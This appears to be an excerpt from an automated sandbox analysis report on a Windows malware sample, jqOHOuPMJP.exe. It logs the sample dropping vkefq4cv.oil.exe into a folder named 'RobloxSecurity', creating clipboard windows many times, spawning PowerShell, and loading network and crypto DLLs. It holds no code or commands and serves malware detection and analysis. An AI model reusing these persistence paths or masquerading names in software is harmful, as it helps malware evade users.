                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Code function: 0_2_02B8E00C
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Code function: 0_2_06258E50
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Code function: 0_2_0625A268
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Code function: 0_2_06250006
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Code function: 0_2_06250040
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Code function: 0_2_067EEDD1
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Code function: 0_2_06EF04F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04F5B490
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04F5B471
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08803A98
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe | Code function: 4_2_00007FFD9B9A2B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 11_2_00007FFD9B98830A
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 11_2_00007FFD9B972B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 11_2_00007FFD9B989762
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 11_2_00007FFD9B987B8D
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 11_2_00007FFD9B977D15
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 18_2_00007FFD9B978B08
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 18_2_00007FFD9B9882EA
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 18_2_00007FFD9B972B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 18_2_00007FFD9B989742
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 18_2_00007FFD9B987B6D
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 18_2_00007FFD9B977D59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 42_2_00007FFD9B982B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 42_2_00007FFD9B9806D1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 42_2_00007FFD9B987D59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 44_2_00007FFD9B962B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 44_2_00007FFD9B967D59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 45_2_00007FFD9B992B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 45_2_00007FFD9B9978F5
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1796380426.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe, 00000000.00000000.1644125840.0000000000946000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHab9b84cf0be099b26b5d8bd8efac02917c.exeT vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe | Binary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: textinputframework.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
